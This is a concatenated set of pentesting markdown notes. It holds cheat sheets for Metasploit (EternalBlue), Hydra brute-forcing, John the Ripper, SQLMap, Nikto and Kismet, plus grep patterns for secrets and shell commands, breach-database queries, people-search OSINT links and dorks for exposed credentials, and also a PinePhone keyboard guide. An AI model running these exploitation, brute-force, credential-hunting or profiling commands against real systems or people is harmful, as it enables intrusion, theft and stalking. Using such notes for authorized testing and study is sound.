129 | 130 | 3. Filter packets to show only HTTP traffic: 131 | ```sh 132 | http 133 | ``` 134 | 135 | 4. Follow TCP stream: 136 | - Right-click on a packet and select "Follow" > "TCP Stream" 137 | 138 | ## Metasploit Framework 139 | Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. 140 | 141 | 142 | - Exploit known vulnerabilities. 143 | - Perform post-exploitation modules to gather information. 
144 | - Use Metasploit for penetration testing. 145 | 146 | **Commands:** 147 | 1. Install Metasploit Framework: 148 | ```sh 149 | sudo apt install -y metasploit-framework 150 | ``` 151 | 152 | 2. Exploit a vulnerability using Metasploit: 153 | ```sh 154 | msfconsole 155 | use exploit/windows/smb/ms17_010_eternalblue 156 | set RHOST 192.168.1.10 157 | run 158 | ``` 159 | 160 | 3. Perform a post-exploitation module: 161 | ```sh 162 | use post/windows/gather/enum_shares 163 | set SESSION 1 164 | run 165 | ``` 166 | 167 | ## Hydra 168 | Hydra is a parallelized login cracker which supports numerous protocols to attack. 169 | 170 | 171 | - Perform brute-force attacks on various services. 172 | - Test the strength of authentication mechanisms. 173 | 174 | **Commands:** 175 | 1. Install Hydra: 176 | ```sh 177 | sudo apt install -y hydra 178 | ``` 179 | 180 | 2. Brute-force SSH login: 181 | ```sh 182 | hydra -l admin -P /path/to/passwords.txt 192.168.1.10 ssh 183 | ``` 184 | 185 | 3. Brute-force FTP login: 186 | ```sh 187 | hydra -l admin -P /path/to/passwords.txt ftp://192.168.1.10 188 | ``` 189 | 190 | ## John the Ripper 191 | John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. 192 | 193 | 194 | - Crack password hashes using wordlists. 195 | - Perform brute-force attacks on password hashes. 196 | 197 | **Commands:** 198 | 1. Install John the Ripper: 199 | ```sh 200 | sudo apt install -y john 201 | ``` 202 | 203 | 2. Crack a password hash using a wordlist: 204 | ```sh 205 | john --wordlist=/usr/share/wordlists/rockyou.txt /path/to/hash.txt 206 | ``` 207 | 208 | 3. Perform a brute force attack: 209 | ```sh 210 | john --incremental /path/to/hash.txt 211 | ``` 212 | 213 | ## SQLMap 214 | SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. 
215 | 216 | 217 | - Perform SQL injection to extract database information. 218 | - Automate database takeover. 219 | 220 | **Commands:** 221 | 1. Install SQLMap: 222 | ```sh 223 | sudo apt install -y sqlmap 224 | ``` 225 | 226 | 2. Perform SQL injection on a vulnerable URL: 227 | ```sh 228 | sqlmap -u "http://example.com/vuln?id=1" --dbs 229 | ``` 230 | 231 | 3. Extract database information: 232 | ```sh 233 | sqlmap -u "http://example.com/vuln?id=1" -D database_name --tables 234 | ``` 235 | 236 | ## Nikto 237 | Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. 238 | 239 | 240 | - Scan web servers for vulnerabilities. 241 | - Identify outdated server versions and configurations. 242 | 243 | **Commands:** 244 | 1. Install Nikto: 245 | ```sh 246 | sudo apt install -y nikto 247 | ``` 248 | 249 | 2. Scan a web server for vulnerabilities: 250 | ```sh 251 | nikto -h http://example.com 252 | ``` 253 | 254 | ## Kismet 255 | Kismet is a wireless network and device detector, sniffer, wardriving tool, and WIDS (wireless intrusion detection) framework. 256 | 257 | 258 | - Discover wireless networks and devices. 259 | - Log GPS coordinates for networks. 260 | 261 | **Commands:** 262 | 1. Install Kismet: 263 | ```sh 264 | sudo apt install -y kismet 265 | ``` 266 | 267 | 2. Configure Kismet to use GPSD: 268 | ```sh 269 | sudo nano /etc/kismet/kismet.conf 270 | ``` 271 | Ensure the following lines are set: 272 | ```sh 273 | gps=true 274 | gpstype=gpsd 275 | gpshost=localhost:2947 276 | ``` 277 | 278 | 3. 
Start Kismet with GPS: 279 | ```sh 280 | sudo kismet -c wlan0 --use-gpsd-gps 281 | ``` 282 | 283 | -------------------------------------------------------------------------------- /hardware/Upgrades-Mods/ppkb_kali_nethunter_pinephone_install.md: -------------------------------------------------------------------------------- 1 | ## Pinephone Keyboard 2 | _A guide to installing the ppkb userspace driver on the Kali Nethunter distro_ 3 | 4 | ### 1. Install Dependencies 5 | 6 | `sudo apt update && sudo apt upgrade` 7 | 8 | `sudo apt install build-essential linux-headers-$(uname -r) git` 9 | 10 | `sudo apt install sdcc nano php` 11 | 12 | ### 2. Install Userspace Driver 13 | 14 | `git clone https://xff.cz/git/pinephone-keyboard/` 15 | 16 | `cd pinephone-keyboard` 17 | 18 | `make` 19 | 20 | ### Persist the changes 21 | 22 | 1. Create a service for the driver: 23 | > [!Note] 24 | > Ensure to change the path to where you compiled the driver in the `ExecStart` path 25 | 26 | `sudo nano /etc/systemd/system/ppkb-i2c-inputd.service` 27 | 28 | ``` 29 | [Unit] 30 | Description=PinePhone Keyboard Service Daemon 31 | After=multi-user.target 32 | 33 | [Service] 34 | Type=simple 35 | ExecStart=/home/kali/pinephone-keyboard/build/ppkb-i2c-inputd 36 | Restart=on-failure 37 | 38 | [Install] 39 | WantedBy=multi-user.target 40 | ``` 41 | 42 | 2. Blacklist kernel driver 43 | 44 | `echo 'blacklist kb151' | sudo tee /etc/modprobe.d/blacklist.conf` 45 | 46 | 3. Update ram filesystem with these changes 47 | 48 | `sudo update-initramfs -u` 49 | 50 | 4. Enable the service we created 51 | 52 | `sudo systemctl enable ppkb-i2c-inputd.service` 53 | 54 | 5. Define the keboard model **(don't skip this step)** 55 | 56 | `echo 'export XKB_DEFAULT_MODEL=ppkb' | sudo tee -a ~/.profile` 57 | 58 | 6. Reboot 59 | 60 | `sudo reboot now` 61 | 62 | 3. ## Set Modifier Key 63 | 64 | 1. On Pinephone, open Settings 65 | 2. Select Keyboard > Alternate Characters Key 66 | 3. 
Select Left Super (Pinecone Key, example) 67 | 4. Hold the defined key and use the top row symbols 68 | 69 | You're Done! 70 | 71 | -------------------------------------------------------------------------------- /repos/BurpPlugins.md: -------------------------------------------------------------------------------- 1 | ## Burp Extensions & Tips 2 | 3 | ### Extensions 4 | 5 | - **[JS Link Finder](https://github.com/portswigger/js-link-finder)** by [InitRoot](https://twitter.com/initroott) 6 | - **[Upload Scanner](https://github.com/portswigger/upload-scanner)** by [Tobias ‘floyd’ Ospelt](https://twitter.com/floyd_ch) 7 | - **[Auth Analyzer](https://github.com/portswigger/auth-analyzer)** by [Simon Reinhart](https://github.com/simioni87) 8 | - **[Turbo Intruder](https://github.com/portswigger/turbo-intruder)** by [James Kettle](https://twitter.com/albinowax) 9 | - **[HTTP Request Smuggler](https://github.com/portswigger/http-request-smuggler)** by [James Kettle](https://twitter.com/albinowax) 10 | - [AWS Security Checks](https://portswigger.net/bappstore/f078b9254eab40dc8c562177de3d3b2d) 11 | 12 | - [xnl-h4ck3r/auto-repeater](https://github.com/xnl-h4ck3r/auto-repeater) 13 | 14 | - [/xnl-h4ck3r/GAP](https://github.com/xnl-h4ck3r/GAP-Burp-Extension) 15 | 16 | - [graphquail](https://github.com/forcesunseen/graphquail) 17 | 18 | - [BurpSuiteSharpener](https://github.com/mdsecresearch/BurpSuiteSharpener) 19 | 20 | - [DNS-Analyzer](https://github.com/The-Login/DNS-Analyzer) 21 | 22 | - [PyCript](https://github.com/Anof-cyber/PyCript) 23 | 24 | - [ParaForge](https://github.com/Anof-cyber/ParaForge) 25 | 26 | - [SSRFmap](https://github.com/swisskyrepo/SSRFmap) 27 | 28 | - [burp-vps-proxy](https://github.com/d3mondev/burp-vps-proxy) 29 | 30 | - [JSpector](https://github.com/hisxo/JSpector) 31 | 32 | - [ReconAIzer](https://github.com/hisxo/ReconAIzer) 33 | 34 | - [Container proxy for 🦊 Firefox](https://addons.mozilla.org/en-US/firefox/addon/container-proxy/) 35 | 36 | - 
[BurpBounty](https://github.com/wagiro/BurpBounty/tree/master/profiles/) 37 | 38 | ## Tips 39 | 40 | *[6 Burp Suite Tips & Tricks](https://taksec.medium.com/6-burp-suite-tips-tricks-60592cf843ba)* 41 | 42 | *[Reflected XSS into HTML context with nothing encoded](https://systemweakness.com/reflected-xss-into-html-context-with-nothing-encoded-4789a7e973ba?source=rss----f20a9840e177---4)* 43 | -------------------------------------------------------------------------------- /resources/Command-Line/grep.md: -------------------------------------------------------------------------------- 1 | # `grep Cheatsheet` 2 | 3 | Use with [grep clipboard commands](https://github.com/Root-Down-Digital/pentesting-resources/blob/main/resources/Command-Line/pbCopy-Paste.md) 4 | 5 | ## Basic Usage 6 | 7 | | Description | Command | 8 | |--------------------------------------------------|---------------------------------------| 9 | | Search for a Specific Pattern in a File | `grep pattern file.txt` | 10 | | Search for a Specific Pattern in Multiple Files | `grep pattern file1.txt file2.txt` | 11 | | Case-Insensitive Search | `grep -i pattern file.txt` | 12 | | Display Line Numbers with Matches | `grep -n pattern file.txt` | 13 | | Search for a Pattern Recursively in Directories | `grep -r pattern /path/to/directory` | 14 | 15 | ## Output Control 16 | 17 | | Description | Command | 18 | |--------------------------------------------------|---------------------------------------| 19 | | Display Only Matching Parts of Lines | `grep -o pattern file.txt` | 20 | | Count the Number of Matching Lines | `grep -c pattern file.txt` | 21 | | Invert Match to Display Non-Matching Lines | `grep -v pattern file.txt` | 22 | | Display File Names with Matches | `grep -l pattern /path/to/directory/*`| 23 | | Display File Names without Matches | `grep -L pattern /path/to/directory/*`| 24 | 25 | ## Advanced Search 26 | 27 | | Description | Command | 28 | 
|--------------------------------------------------|---------------------------------------| 29 | | Search for a Regular Expression | `grep -E regex file.txt` | 30 | | Search for Fixed Strings (No Regular Expressions)| `grep -F 'fixed string' file.txt` | 31 | | Highlight Matches in the Output | `grep --color=auto pattern file.txt` | 32 | | Display the Count of Matches in Each File | `grep -c pattern /path/to/directory/*`| 33 | 34 | ## Context Matching 35 | 36 | | Description | Command | 37 | |--------------------------------------------------|---------------------------------------| 38 | | Display Matching Lines with 3 Lines of Context Before and After | `grep -C 3 pattern file.txt` | 39 | | Display Matching Lines with 3 Lines of Preceding Context | `grep -B 3 pattern file.txt` | 40 | | Display Matching Lines with 3 Lines of Following Context | `grep -A 3 pattern file.txt` | 41 | 42 | ## Additional Commands for Red & Blue Teams 43 | 44 | | Description | Command | 45 | |--------------------------------------------------|-------------------------------------------------------------| 46 | | Search for IP Addresses | `grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' file.txt` | 47 | | Search for URLs | `grep -Eo 'http[s]?://[^ ]+' file.txt` | 48 | | Extract Email Addresses | `grep -Eo '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b' file.txt` | 49 | | Search for HTTP Status Codes | `grep -Eo 'HTTP/[0-9\.]+\s+[0-9]{3}' file.txt` | 50 | | Find Base64 Encoded Strings | `grep -Eo '([A-Za-z0-9+/]{4}){2,}' file.txt` | 51 | | Search for Credit Card Numbers | `grep -Eo '\b[0-9]{13,16}\b' file.txt` | 52 | | Detect SQL Injection Attempts | `grep -Ei 'union.*select\|select.*from\|drop\s+table' file.txt` | 53 | | Search for JavaScript Functions | `grep -Eo 'function\s+[a-zA-Z0-9_]+\s*\(' file.txt` | 54 | | Extract Social Security Numbers | `grep -Eo '\b[0-9]{3}-[0-9]{2}-[0-9]{4}\b' file.txt` | 55 | | Find Passwords in Files | `grep -Eo 'password\s*[:=]\s*\S+' file.txt` | 56 | | Identify Private Keys (PEM header; `--` stops the leading dashes being read as options, and grep is line-based so the BEGIN/END pair cannot be matched in one pattern) | `grep -Eo -- '-----BEGIN (RSA \|DSA \|EC )?PRIVATE KEY-----' file.txt` | 57 | | Extract Phone Numbers | `grep -Eo '\b[0-9]{3}-[0-9]{3}-[0-9]{4}\b' file.txt` | 58 | | Detect Shell Commands | `grep -Eo '(\bsh\b\|\bbash\b\|\bpython\b\|\bperl\b\|\bphp\b)' file.txt` | 59 | | Search for Hidden Directories | `grep -Eo '\/\.[a-zA-Z0-9_-]+' file.txt` | 60 | | Find JavaScript Variables | `grep -Eo 'var\s+[a-zA-Z0-9_]+\s*=' file.txt` | 61 | 62 | 63 | 64 | ## Miscellaneous 65 | 66 | | Description | Command | 67 | |--------------------------------------------------|----------------------------------------| 68 | | Suppress Errors about Non-Existent or Unreadable Files | `grep -s pattern file.txt` | 69 | | Use Extended Regular Expressions | `grep -E pattern file.txt` | 70 | | Show the Byte Offset of Matches | `grep 
-b pattern file.txt` | 71 | | Match the Whole Word | `grep -w word file.txt` | 72 | | Match the Whole Line | `grep -x 'whole line' file.txt` | 73 | | Use a Pattern File | `grep -f patterns.txt file.txt` | 74 | | Exclude a Pattern | `grep -v exclude_pattern file.txt` | 75 | | Include Binary Files in the Search | `grep -a pattern binaryfile.bin` | 76 | | Search for Lines Starting with a Specific Pattern| `grep ^pattern file.txt` | 77 | | Search for Lines Ending with a Specific Pattern | `grep pattern$ file.txt` | 78 | | Print the Filename with Each Match | `grep -H pattern file.txt` | 79 | | Display the Total Number of Matches | `grep -o pattern file.txt \| wc -l` | 80 | | Display Lines Containing Multiple Patterns | `grep pattern1 file.txt \| grep pattern2` | 81 | | Display a List of Files and Their Line Count with Matches | `grep -c pattern *.txt` | 82 | | Treat Binary Files as Text When Matching | `grep --binary-files=text pattern file.txt` | 83 | | Include Line and Byte Offset in the Output | `grep -b -n pattern file.txt` | 84 | | Search Using Perl-Compatible Regular Expressions | `grep -P pattern file.txt` | 85 | | List Files with No Matches | `grep -L pattern file.txt` | 86 | | Exclude Specific Files from Search | `grep --exclude=file.txt pattern /path/to/search` | 87 | | Exclude Multiple Files from Search | `grep --exclude={file1.txt,file2.txt} pattern /path/to/search` | 88 | | Exclude Specific Directories from Search | `grep --exclude-dir=dir pattern /path/to/search` | 89 | | Include Only Specific Files in Search | `grep --include=\*.{c,h} pattern /path/to/search` | 90 | -------------------------------------------------------------------------------- /resources/Command-Line/pbCopy-Paste.md: -------------------------------------------------------------------------------- 1 | ## `Grep` macOS Clipboard Cheatsheet 2 | 3 | ### Clipboard Commands 4 | 5 | | Description | Command | 6 | 
|--------------------------------------------------|----------------------------------------| 7 | | **Copy Text to Clipboard** | `echo "Sensitive Data" \| pbcopy` | 8 | | **Paste Text from Clipboard** | `pbpaste` | 9 | | **Copy File Contents to Clipboard** | `cat secrets.txt \| pbcopy` | 10 | | **Save Clipboard Contents to a File** | `pbpaste > extracted_secrets.txt` | 11 | | **Copy and Paste Between Files** | `cat source.txt \| pbcopy`
`pbpaste > destination.txt` | 12 | | **Append Clipboard Contents to a File** | `pbpaste >> logs.txt` | 13 | | **Script Example - Copy and Paste** | `echo "Security Alert: Unauthorized access detected!" \| pbcopy`
`echo "Clipboard contents:"`
`pbpaste` | 14 | | **Copy User Input to Clipboard** | `read -r -p "Enter command: " input`
`echo "$input" \| pbcopy`
`echo "Clipboard now contains:"`
`pbpaste` | 15 | 16 | ### Grep Commands for Clipboard Content 17 | 18 | | Description | Command | 19 | |--------------------------------------------------|-------------------------------------------------------------| 20 | | **Search for a Specific Word in Clipboard** | `pbpaste \| grep "password"` | 21 | | **Search for a Case-Insensitive Match** | `pbpaste \| grep -i "token"` | 22 | | **Display Line Numbers with Matches** | `pbpaste \| grep -n "error"` | 23 | | **Search for a Regular Expression** | `pbpaste \| grep -E "^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$"` | 24 | | **Invert Match to Display Non-Matching Lines** | `pbpaste \| grep -v "debug"` | 25 | | **Count the Number of Matching Lines** | `pbpaste \| grep -c "failed"` | 26 | | **Display Only Matching Parts of Lines** | `pbpaste \| grep -o "success"` | 27 | | **Search for Lines Starting with a Pattern** | `pbpaste \| grep "^START"` | 28 | | **Search for Lines Ending with a Pattern** | `pbpaste \| grep "END$"` | 29 | | **Highlight Matches in the Output** | `pbpaste \| grep --color=auto "keyword"` | 30 | -------------------------------------------------------------------------------- /resources/OSINT/Dehashed-Cheatsheet.md: -------------------------------------------------------------------------------- 1 | # Dehashed Cheatsheet 2 | 3 | >Note: You can mix and match as many operators as you want. Keep in mind you cannot use wildcards and/or regex operations in the same search. 4 | 5 | ## Basic Search 6 | 7 | | **Search Type** | **Query Example** | **Description** | 8 | |------------------------|---------------------------------------|----------------------------------------------------------------------| 9 | | Simple Query | `email@example.com` | Searches for occurrences of the exact email. | 10 | | Wildcard Search | `email@*` | Searches for emails from any domain starting with "email@". | 11 | | Multiple Terms | `term1 AND term2` | Searches for records containing both term1 and term2. 
| 12 | | Exclusion | `term1 -term2` | Searches for records containing term1 but not term2. | 13 | 14 | ## Field-Specific Searches 15 | 16 | | **Field** | **Query Example** | **Description** | 17 | |------------------------|---------------------------------------|----------------------------------------------------------------------| 18 | | Email | `email:email@example.com` | Searches specifically for the email field. | 19 | | Username | `username:username123` | Searches for occurrences of the specified username. | 20 | | Password | `password:password123` | Searches for records containing the specified password. | 21 | | Name | `name:"John Doe"` | Searches for the exact name. | 22 | | IP Address | `ip:192.168.1.1` | Searches for the specified IP address. | 23 | | Phone Number | `phone:1234567890` | Searches for the specified phone number. | 24 | | Address | `address:"123 Main St"` | Searches for a specific street address. | 25 | | Domain | `domain:example.com` | Searches for records associated with a domain. | 26 | 27 | ## Effective Search Tips 28 | 29 | **Combine Operators:** 30 | 31 | `email:example@example.com&username:test&domain:example.com` 32 | 33 | **Use Regex:** 34 | 35 | `email:/.*@example\.com/` 36 | 37 | **Filter Data Sources:** 38 | 39 | `email:example@example.com&source:"Breached Site"` 40 | 41 | **Date Range Filtering:** 42 | 43 | `date:[2021-01-01 TO 2022-01-01]` 44 | 45 | 46 | 47 | ## Advanced Search 48 | 49 | | **Technique** | **Query Example** | **Description** | 50 | |------------------------|---------------------------------------|----------------------------------------------------------------------| 51 | | Regular Expressions | `email:/.*@example\.com/` | Uses regex to search for emails from example.com domain. | 52 | | Date Range | `date:[2021-01-01 TO 2022-01-01]` | Searches for records within the specified date range. | 53 | | Data Sources | `source:"Breached Site"` | Searches within a specific breached site. 
| 54 | | Combining Queries | `email:email@example.com AND source:"Breached Site"` | Combines multiple query parameters. | 55 | 56 | ## Example Queries with Multiple Operators 57 | 58 | | **Example** | **Query** | 59 | |------------------------|----------------------------------------------------------------------------| 60 | | Basic Email Query | `email:example@example.com` | 61 | | Username Query | `username:example` | 62 | | Domain Query | `domain:example.com` | 63 | | Domain with Data | `domain:example.com&data=collections` | 64 | | Email and Username | `email:example@example.com&username:test` | 65 | | Email with Wildcard | `email:example@example.com&wildcard` | 66 | | Username with Wildcard | `username:test&data=collections&wildcard` | 67 | | Complex Search | `email:example@example.com&username:test&data=collections&wildcard` | 68 | | Regex Example | `username:example&email:example@example.com&name:/[A-Za-z]/&ip_address:127.0.0.1&data=collections&regex` | 69 | 70 | ## Command-Line Tool Integration 71 | 72 | ### Using `curl` 73 | ```bash 74 | curl -X GET "https://api.dehashed.com/search?query=email:email@example.com&username:test" \ 75 | -H "Accept: application/json" \ 76 | -H "Authorization: Basic <base64 of EMAIL:API_KEY — placeholder>" 77 | ``` 78 | ### Using Python 79 | ```python 80 | import requests 81 | from requests.auth import HTTPBasicAuth 82 | 83 | url = "https://api.dehashed.com/search?query=email:email@example.com&username:test" 84 | response = requests.get(url, auth=HTTPBasicAuth('YOUR_EMAIL', 'YOUR_API_KEY')) 85 | print(response.json()) 86 | ``` 87 | -------------------------------------------------------------------------------- /resources/OSINT/GuideLinks.md: -------------------------------------------------------------------------------- 1 | ## Introduction 2 | 3 | This document contains a comprehensive list of OSINT tools and resources. 
4 | 5 | ### User Research 6 | 7 | - LeakCheck - [https://leakcheck.io/](https://leakcheck.io/) 8 | - SnusBase - [https://snusbase.com/](https://snusbase.com/) 9 | - [Scylla.sh](http://scylla.sh/) - [https://scylla.sh/](https://scylla.sh/) 10 | - HaveIBeenPwned - [https://haveibeenpwned.com/](https://haveibeenpwned.com/) 11 | 12 | ### Usernames 13 | 14 | - NameChk - [https://namechk.com/](https://namechk.com/) 15 | - WhatsMyName - [https://whatsmyname.app/](https://whatsmyname.app/) 16 | - NameCheckup - [https://namecheckup.com/](https://namecheckup.com/) 17 | 18 | ### People 19 | 20 | - WhitePages - [https://www.whitepages.com/](https://www.whitepages.com/) 21 | - TruePeopleSearch - [https://www.truepeoplesearch.com/](https://www.truepeoplesearch.com/) 22 | - FastPeopleSearch - [https://www.fastpeoplesearch.com/](https://www.fastpeoplesearch.com/) 23 | - FastBackgroundCheck - [https://www.fastbackgroundcheck.com/](https://www.fastbackgroundcheck.com/) 24 | - WebMii - [https://webmii.com/](https://webmii.com/) 25 | - PeekYou - [https://peekyou.com/](https://peekyou.com/) 26 | - 411 - [https://www.411.com/](https://www.411.com/) 27 | - Spokeo - [https://www.spokeo.com/](https://www.spokeo.com/) 28 | - That'sThem - [https://thatsthem.com/](https://thatsthem.com/) 29 | - Voter Records - [https://www.voterrecords.com](https://www.voterrecords.com/) 30 | 31 | ### Phonenumbers 32 | 33 | - TrueCaller - [https://www.truecaller.com/](https://www.truecaller.com/) 34 | - CallerID Test - [https://calleridtest.com/](https://calleridtest.com/) 35 | - Infobel - [https://infobel.com/](https://infobel.com/) 36 | 37 | ### Birthdays 38 | 39 | "Name of target" intext:"happy birthday" 40 | 41 | ### Resumes 42 | 43 | - Use CV or Resume 44 | 45 | "Name of targert" resume filetype:pdf 46 | 47 | ### Social Media 48 | 49 | - Twint - [https://github.com/twintproject/twint](https://github.com/twintproject/twint) 50 | 51 | ### Twitter 52 | 53 | - Twitter Advanced Search - 
[https://twitter.com/search-advanced](https://twitter.com/search-advanced) 54 | - Social Bearing - [https://socialbearing.com/](https://socialbearing.com/) 55 | - Twitonomy - [https://www.twitonomy.com/](https://www.twitonomy.com/) 56 | - Sleeping Time - [http://sleepingtime.org/](http://sleepingtime.org/) 57 | - Mentionmapp - [https://mentionmapp.com/](https://mentionmapp.com/) 58 | - Tweetbeaver - [https://tweetbeaver.com/](https://tweetbeaver.com/) 59 | - [Spoonbill.io](http://spoonbill.io/) - [http://spoonbill.io/](http://spoonbill.io/) 60 | - Tinfoleak - [https://tinfoleak.com/](https://tinfoleak.com/) 61 | - TweetDeck - [https://tweetdeck.com/](https://tweetdeck.com/) 62 | 63 | ### Facebook 64 | 65 | - Sowdust Github - [https://sowdust.github.io/fb-search/](https://sowdust.github.io/fb-search/) 66 | - IntelligenceX Facebook Search - [https://intelx.io/tools?tab=facebook](https://intelx.io/tools?tab=facebook) 67 | 68 | ### Instagram 69 | 70 | - Wopita - [https://wopita.com/](https://wopita.com/) 71 | - Code of a Ninja - [https://codeofaninja.com/tools/find-instagram-user-id/](https://codeofaninja.com/tools/find-instagram-user-id/) 72 | - InstaDP - [https://www.instadp.com/](https://www.instadp.com/) 73 | - ImgInn - [https://imginn.com/](https://imginn.com/) 74 | 75 | ### Snapchat Maps 76 | 77 | - [https://map.snapchat.com](https://map.snapchat.com/) 78 | -------------------------------------------------------------------------------- /resources/OSINT/dorks/GitDorks.md: -------------------------------------------------------------------------------- 1 | ## GitDorks 2 | 3 | Directory Busting 4 | ``` 5 | target intitle:index of config.php 6 | target inurl:/log intext:POST / OR intext:GET / filetype:log 7 | target intitle:index of inurl:wp-content/uploads 8 | target intitle:index of parent directory 9 | target inurl:/saml2 10 | target inurl:/php/.. 
-github 11 | target inurl:/swf/ intitle:flashvars -github 12 | target inurl:/AHS/ 13 | target inurl:/phpmyadmin/ filetype:sql 14 | target inurl:/wp-content/uploads/ filetype:php 15 | target inurl:/cgi-bin/ 16 | ``` 17 | 18 | Log-related 19 | ``` 20 | target inurl:/log intext:POST / OR intext:GET / filetype:log 21 | target ext:log php error OR mysql error 22 | target intext:Thank you for your purchase filetype:log 23 | target intext:login OR intext:username OR intext:password filetype:log 24 | ``` 25 | 26 | Authentication 27 | ``` 28 | target intext:Restricted Access OR intitle:Authentication Required 29 | target intitle:Windows SBS Internet Applications intext:remote desktop 30 | target intext:Novell WebAccess intext:User Name OR Password 31 | target intext:no robots intext:noindex intext:nofollow OR intext:no robots intext:noindex intext:none OR intext:no robots intext:noindex intext:noarchive OR intext:no robots intext:noindex intext:nosnippet 32 | target intitle:Remote Desktop Web Connection inurl:tsweb 33 | target intext:mail.domain.com OR intext:webmail.domain.com OR intext:owa.domain.com 34 | target inurl:/cgi-bin/pass.txt 35 | ``` 36 | 37 | Software 38 | ``` 39 | target intitle:phpMyAdmin inurl:db_structure.php 40 | target intitle:HFS / HTTP File Server 41 | target intitle:phpMyAdmin Welcome to phpMyAdmin 42 | target intitle:Apache Status intext:Apache Server Status for 43 | target intext:Lucky PHP Shell OR intitle:Lucky PHP Shell 44 | target intitle:Zend Server 7 45 | target intext:DHCP FORCER inurl:/remote.php 46 | target intext:Debut Video Capture Software OR intitle:Debut - Record and capture video -registration code 47 | target intitle:WebcamXP 5 Server Status 48 | target intitle:nagios filetype:cfg 49 | target intext:Grandstream Networks, Inc. 
All Rights Reserved 50 | target intext:License Key OR Product Key OR CD Key filetype:txt 51 | target intext:Powered by Simple Machines OR intitle:SMF 52 | site:example.com inurl:wp-content 53 | site:example.com inurl:wp-includes 54 | site:example.com intext:"WordPress" intext:"powered by" 55 | site:example.com intext:"Joomla" intext:"powered by" 56 | site:example.com intext:"Drupal" intext:"powered by" 57 | site:example.com intext:"Magento" intext:"powered by" 58 | ``` 59 | 60 | Sensitive pages/source 61 | ``` 62 | site:example.com inurl:.git intext:"index of" 63 | site:example.com allintext:index filetype:git 64 | site:example.com inurl:admin 65 | site:example.com inurl:wp-admin 66 | site:example.com intext:"password" 67 | site:example.com intext:"api_key" 68 | site:example.com intext:"username" intext:"password" 69 | site:example.com intext:"email" intext:"password" 70 | site:example.com inurl:vulnerabilities 71 | 72 | Other Keywords: 73 | app_id, auth_token, client_certificate, client_secret_key, encrypted_credentials, fingerprint_data, github_app_token, identity_provider_token, key_pair, login_token, oauth_token, private_access_token, secret_access_key, session_id, signing_key, ssh_certificate, token_id, user_certificate, webhook_token, password, api_key, access_key, dbpassword, dbuser, pwd, pwds, aws_access, key, token, credentials, pass, pwd, passwd, private, preprod, appsecret 74 | ``` 75 | 76 | Files 77 | ``` 78 | site:example.com filetype:xls 79 | site:example.com ext:pdf 80 | 81 | language: assembly, c, c#, c++, clojure, dart, elixir, erlang, go, haskell, java, javascript, kotlin, lua, perl, php, python, ruby, rust, swift, json, bash, shell 82 | 83 | ext: 84 | conf, css, csv, html, json, log, md, pdf, php, ps1, py, rb, sql, toml, txt, xml, yaml, yml, zip, bat, config, ini, env 85 | 86 | filename: 87 | .env, .env.local, .gitconfig, .htaccess, .npmrc, .prettierrc, .ssh/idrsa, docker-compose.yaml, package-lock.json, package.json, server.js, 
webpack.config.js, netrpc, .git-credentials, .history, .htpasswd, bashhistory` 88 | 89 | ``` 90 | -------------------------------------------------------------------------------- /resources/OSINT/dorks/GoogleDorks.md: -------------------------------------------------------------------------------- 1 | ## Top Google Dorks 2 | *🔍 Search and profit* 3 | 4 | #### Site: (Search specific site) 5 | ``` 6 | site:example.com intext:confidential 7 | site:example.com ext:log 8 | site:example.com inurl:admin 9 | site:example.com inurl:login 10 | site:example.com inurl:secure 11 | site:example.com filetype:sql 12 | site:example.com ext:xml 13 | site:example.com ext:csv 14 | site:example.com ext:json 15 | site:example.com ext:asp 16 | ``` 17 | #### Extension: (Search specific file extensions) 18 | ``` 19 | site:example.com ext:doc 20 | site:example.com ext:docx 21 | site:example.com ext:odt 22 | site:example.com ext:txt 23 | site:example.com ext:rtf 24 | site:example.com ext:pdf 25 | site:example.com ext:xls 26 | site:example.com ext:xlsx 27 | site:example.com ext:ini 28 | site:example.com ext:bak 29 | ``` 30 | #### Inurl: (Search URLs containing keywords) 31 | ``` 32 | site:example.com inurl:admin 33 | site:example.com inurl:login 34 | site:example.com inurl:secure 35 | site:example.com inurl:upload 36 | site:example.com inurl:download 37 | site:example.com inurl:profile 38 | site:example.com inurl:edit 39 | site:example.com inurl:password 40 | site:example.com inurl:register 41 | site:example.com inurl:account 42 | ``` 43 | #### Pastebin Leaks: (Search for leaks on Pastebin) 44 | ``` 45 | site:pastebin.com "username" 46 | site:pastebin.com "password" 47 | site:pastebin.com "email" 48 | site:pastebin.com "credentials" 49 | site:pastebin.com "leak" 50 | site:pastebin.com "database" 51 | site:pastebin.com "hack" 52 | site:pastebin.com "breach" 53 | site:pastebin.com "login" 54 | site:pastebin.com "dump" 55 | ``` 56 | #### Index of: (Search for directory listings) 57 | ``` 58 | 
site:example.com "index of" passwd 59 | site:example.com "index of" password 60 | site:example.com "index of" config 61 | site:example.com "index of" db 62 | site:example.com "index of" users 63 | site:example.com "index of" admin 64 | site:example.com "index of" backup 65 | site:example.com "index of" login 66 | site:example.com "index of" secure 67 | site:example.com "index of" secret 68 | ``` 69 | #### Filetypes: (Search for specific file types) 70 | ``` 71 | site:example.com filetype:sql 72 | site:example.com filetype:db 73 | site:example.com filetype:ini 74 | site:example.com filetype:txt 75 | site:example.com filetype:cfg 76 | site:example.com filetype:env 77 | site:example.com filetype:bak 78 | site:example.com filetype:log 79 | site:example.com filetype:dat 80 | site:example.com filetype:save 81 | ``` 82 | #### Cache: (Search Google cache) 83 | ``` 84 | cache:example.com login 85 | cache:example.com register 86 | cache:example.com upload 87 | cache:example.com download 88 | cache:example.com profile 89 | cache:example.com account 90 | cache:example.com password 91 | cache:example.com secure 92 | cache:example.com admin 93 | cache:example.com secret 94 | ``` 95 | #### Info: (Get info about a specific page) 96 | ``` 97 | info:example.com login 98 | info:example.com register 99 | info:example.com upload 100 | info:example.com download 101 | info:example.com profile 102 | info:example.com account 103 | info:example.com password 104 | info:example.com secure 105 | info:example.com admin 106 | info:example.com secret 107 | ``` 108 | #### Related: (Find related pages) 109 | ``` 110 | related:example.com login 111 | related:example.com register 112 | related:example.com upload 113 | 